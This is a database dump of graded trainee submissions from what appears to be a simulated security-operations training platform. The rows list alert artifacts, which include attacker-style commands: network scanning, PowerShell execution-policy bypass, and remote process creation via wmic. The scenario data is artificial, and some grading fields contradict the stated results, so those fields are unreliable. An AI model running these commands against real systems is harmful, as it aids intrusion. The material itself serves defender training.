(439, 225, 1266, 'graded', 85, 'Verdict is correct (+40). Missed critical artifacts: command nmap -sP 192.168.3.0/24 (1/2). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.3.45\",\"ip-192.168.3.1\",\"cmd-1\"],\"selectedActions\":[\"collect_forensics\",\"isolate_host\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/7/2026, 10:57:36 PM\\nALERT: Internal Reconnaissance Detected via Network Scanning\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 192.168.3.45\\n- [IP] 192.168.3.1\\n- [COMMAND] nmap -sP 192.168.3.0/24\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (3)\\n------------------------------\\n- Isolate Host\\n- Reset Credentials\\n- Collect Forensics\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T11:57:45.017Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts: command nmap -sP 192.168.3.0/24 (1/2). Response actions correct (+30)\",\"missed_items\":[\"command: nmap -sP 192.168.3.0/24\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-07 11:55:22', '2026-03-07 11:57:45', 0, NULL),
(440, 232, 270, 'graded', 60, 'Incorrect verdict. Expected True Positive, got false_positive. All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"hash-3fa85f64\",\"artifact_1\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"block_ip\",\"escalate\",\"reset_credentials\"],\"verdict\":\"false_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/7/2026, 7:21:12 PM\\nALERT: Persistence Mechanism Established [OP: Operation Iron Grid]\\nVERDICT: FALSE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [HASH] 3fa85f64-5717-4562-b3fc-2c963f66afa6\\n- [IP] 10.0.1.15\\n- [FILENAME] C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\malicious.exe\\n- [USERNAME] compromised_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T13:51:15.649Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Incorrect verdict. Expected True Positive, got false_positive. All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-03-07 12:57:07', '2026-03-07 13:51:15', 0, NULL),
(441, 232, 271, 'graded', 85, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.101\",\"ip-10.0.0.5\",\"hash-5f4dcc3b\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"block_ip\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/7/2026, 7:23:25 PM\\nALERT: Lateral Movement to OT Network [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.101\\n- [IP] 10.0.0.5\\n- [HASH] 5f4dcc3b5aa765d61d8327deb882cf99\\n- [USERNAME] jdoe\\n- [IP] 203.0.113.55\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T13:53:28.023Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)\",\"missed_items\":[\"reset_credentials\",\"collect_forensics\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-07 13:51:15', '2026-03-07 13:53:28', 0, NULL),
(442, 232, 272, 'graded', 95, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (5/6)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.105\",\"ip-10.0.0.20\",\"hash-5d41402a\",\"artifact_2\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"reset_credentials\",\"block_ip\",\"block_hash\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/7/2026, 7:26:18 PM\\nALERT: SCADA System Compromise [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.105\\n- [IP] 10.0.0.20\\n- [HASH] 5d41402abc4b2a76b9719d911017c592\\n- [IP] 203.0.113.45\\n- [FILENAME] malicious_script.sh\\n- [USERNAME] unauthorized_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T13:56:20.232Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (5/6)\",\"missed_items\":[\"collect_forensics\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-07 13:53:28', '2026-03-07 13:56:20', 0, NULL),
(443, 232, 274, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-07 13:57:28', '2026-03-07 13:57:28', 0, NULL),
(444, 259, 581, 'graded', 93, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.101\",\"hash-5f4dcc3b5aa765d61d8327deb882cf99,098f6bcd4621d373cade4e832627b4f6,e99a18c428cb38d5f260853678922e03\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 07/03/2026, 20:26:55\\nALERT: Anomalous File Access Patterns [OP: Operation Credit Bureau]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.101\\n- [HASH] 5f4dcc3b5aa765d61d8327deb882cf99,098f6bcd4621d373cade4e832627b4f6,e99a18c428cb38d5f260853678922e03\\n- [FILENAME] /finance/2023_budgets.xlsx\\n- [FILENAME] /hr/employee_records.docx\\n- [FILENAME] /legal/contracts/nda.pdf\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T19:27:45.306Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)\",\"missed_items\":[\"collect_forensics\"],\"strengths\":\"Solid analysis\"}', '2026-03-07 22:27:57', '2026-03-07 19:22:57', '2026-03-07 19:27:45', 0, NULL),
(447, 189, 319, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.5\",\"ip-192.168.1.45\",\"domain-http://malic\",\"artifact_1\",\"artifact_2\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 3:48:53 AM\\nALERT: Suspicious Email Detected [OP: Operation Silent Harvest]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 203.0.113.5\\n- [IP] 192.168.1.45\\n- [DOMAIN] http://maliciousdomain.com/login\\n- [EMAIL] attacker@maliciousdomain.com\\n- [HASH] 5d41402abc4b2a76b9719d911017c592\\n- [FILENAME] Invoice_2023.pdf\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Amadou MANE\",\"submitted_at\":\"2026-03-09T02:49:06.880Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-08 22:12:30', '2026-03-09 02:49:06', 0, NULL),
(448, 225, 1373, 'graded', 85, 'Verdict is correct (+40). Missed critical artifacts: command C:\\Windows\\System32\\cmd.exe /c malicious.exe (1/2). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"hash-e3b0c442\",\"cmd-1\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 1:32:54 PM\\nALERT: Malware Detected via Suspicious Process Execution\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 192.168.1.100\\n- [HASH] e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\n- [COMMAND] C:\\\\Windows\\\\System32\\\\cmd.exe /c malicious.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T02:32:56.225Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts: command C:\\\\Windows\\\\System32\\\\cmd.exe /c malicious.exe (1/2). Response actions correct (+30)\",\"missed_items\":[\"command: C:\\\\Windows\\\\System32\\\\cmd.exe /c malicious.exe\"],\"strengths\":\"Solid analysis\"}', '2026-03-09 05:11:11', '2026-03-09 02:04:11', '2026-03-09 02:32:56', 0, NULL),
(449, 225, 641, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.112\",\"ip-10.0.0.10\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 1:34:08 PM\\nALERT: Unauthorized Access Attempt on Admin Account\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 203.0.113.112\\n- [IP] 10.0.0.10\\n- [USERNAME] admin\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T02:34:11.274Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-09 05:42:21', '2026-03-09 02:33:21', '2026-03-09 02:34:11', 0, NULL),
(450, 225, 1384, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.200\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 1:35:14 PM\\nALERT: Unauthorized Admin Login Attempt\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [IP] 203.0.113.200\\n- [USERNAME] admin\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T02:38:05.847Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-09 05:44:26', '2026-03-09 02:34:26', '2026-03-09 02:38:05', 0, NULL),
(451, 225, 1382, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.55\",\"ip-203.0.113.85\",\"domain-malicious-cr\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"reset_credentials\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 1:42:01 PM\\nALERT: Credential Harvesting Attempt via Phishing Site\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 192.168.1.55\\n- [IP] 203.0.113.85\\n- [DOMAIN] malicious-credentials.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Collect Forensics\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T02:42:09.236Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-09 05:49:43', '2026-03-09 02:40:43', '2026-03-09 02:42:09', 0, NULL),
(452, 225, 1393, 'graded', 70, 'Verdict is correct (+40). Missed critical artifacts: command powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \"Write-Host \'Hello World\'\" (0/1). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.6.15\",\"cmd-1\",\"artifact_3\"],\"selectedActions\":[\"close_alert\"],\"verdict\":\"false_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 1:43:31 PM\\nALERT: Suspicious Command Execution on Workstation\\nVERDICT: FALSE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 192.168.6.15\\n- [COMMAND] powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\"Write-Host \'Hello World\'\\\"\\n- [USERNAME] klee\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (1)\\n------------------------------\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T02:43:36.835Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts: command powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\"Write-Host \'Hello World\'\\\" (0/1). Response actions correct (+30)\",\"missed_items\":[\"command: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\"Write-Host \'Hello World\'\\\"\"],\"strengths\":\"Needs improvement\"}', '2026-03-09 05:49:21', '2026-03-09 02:42:21', '2026-03-09 02:43:36', 0, NULL),
(453, 225, 1391, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.4.10\",\"ip-93.184.216.34\",\"artifact_3\"],\"selectedActions\":[\"close_alert\"],\"verdict\":\"false_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 1:45:25 PM\\nALERT: Unusual Network Connection to External IP\\nVERDICT: FALSE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 192.168.4.10\\n- [IP] 93.184.216.34\\n- [USERNAME] psmith\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (1)\\n------------------------------\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T02:45:30.995Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-09 05:54:14', '2026-03-09 02:44:14', '2026-03-09 02:45:30', 0, NULL),
(454, 225, 643, 'graded', 60, 'Incorrect verdict. Expected false_positive, got benign. Artifact analysis completed (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-198.51.100.50\",\"ip-10.0.0.15\",\"artifact_2\"],\"selectedActions\":[\"close_alert\"],\"verdict\":\"benign\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 1:46:57 PM\\nALERT: False Positive: User Access from Known Location\\nVERDICT: BENIGN\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 198.51.100.50\\n- [IP] 10.0.0.15\\n- [USERNAME] mike\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (1)\\n------------------------------\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T02:47:02.798Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Incorrect verdict. Expected false_positive, got benign. Artifact analysis completed (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', '2026-03-09 05:54:39', '2026-03-09 02:45:39', '2026-03-09 02:47:02', 0, NULL),
(455, 189, 320, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.57\",\"ip-10.0.0.45\",\"hash-b1946ac9\",\"cmd-1\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 3:51:01 AM\\nALERT: Unauthorized Application Execution [OP: Operation Silent Harvest]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.57\\n- [IP] 10.0.0.45\\n- [HASH] b1946ac92492d2347c6235b4d2611184\\n- [COMMAND] powershell.exe -ExecutionPolicy Bypass -File C:\\\\Temp\\\\malicious_script.ps1\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: AMADOU MANE\",\"submitted_at\":\"2026-03-09T02:51:16.367Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 02:49:06', '2026-03-09 02:51:16', 0, NULL),
(456, 189, 321, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.2.15\",\"hash-5d41402a\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 3:54:12 AM\\nALERT: Persistence Mechanism Installed [OP: Operation Silent Harvest]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.2.15\\n- [HASH] 5d41402abc4b2a76b9719d911017c592\\n- [FILENAME] C:\\\\Windows\\\\System32\\\\Tasks\\\\ScheduledTaskMalware\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: AMADOU MANE\",\"submitted_at\":\"2026-03-09T02:54:27.135Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 02:51:16', '2026-03-09 02:54:27', 0, NULL),
(457, 189, 322, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.102\",\"ip-192.168.1.150\",\"hash-3f1d0f1e\",\"cmd-1\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 3:57:07 AM\\nALERT: Lateral Movement Detected [OP: Operation Silent Harvest]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.102\\n- [IP] 192.168.1.150\\n- [HASH] 3f1d0f1e2a2b3c4d5e6f7a8b9c0d1e2f3g4h5i6j\\n- [COMMAND] wmic /node:192.168.1.150 process call create \'cmd.exe /c whoami\'\\n- [IP] 203.0.113.45\\n- [USERNAME] admin_jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: AMADOU MANE\",\"submitted_at\":\"2026-03-09T02:57:18.209Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 02:54:27', '2026-03-09 02:57:18', 0, NULL),
(458, 189, 323, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.0.0.25\",\"ip-203.0.113.45\",\"hash-b1946ac9\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 3:59:06 AM\\nALERT: Data Exfiltration Attempt [OP: Operation Silent Harvest]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 10.0.0.25\\n- [IP] 203.0.113.45\\n- [HASH] b1946ac92492d2347c6235b4d2611184\\n- [FILENAME] confidential_data.zip\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: AMADOU MANE\",\"submitted_at\":\"2026-03-09T02:59:15.881Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 02:57:18', '2026-03-09 02:59:15', 0, NULL),
(459, 189, 324, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.0.5.23\",\"ip-203.0.113.45\",\"hash-e99a18c4\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:01:48 AM\\nALERT: Suspicious Network Traffic Detected [OP: Operation Infinite Loop]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 10.0.5.23\\n- [IP] 203.0.113.45\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [USERNAME] jdoe\\n- [FILENAME] suspicious_payload.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: AMADOU MANE\",\"submitted_at\":\"2026-03-09T03:01:58.280Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 02:59:38', '2026-03-09 03:01:58', 0, NULL),
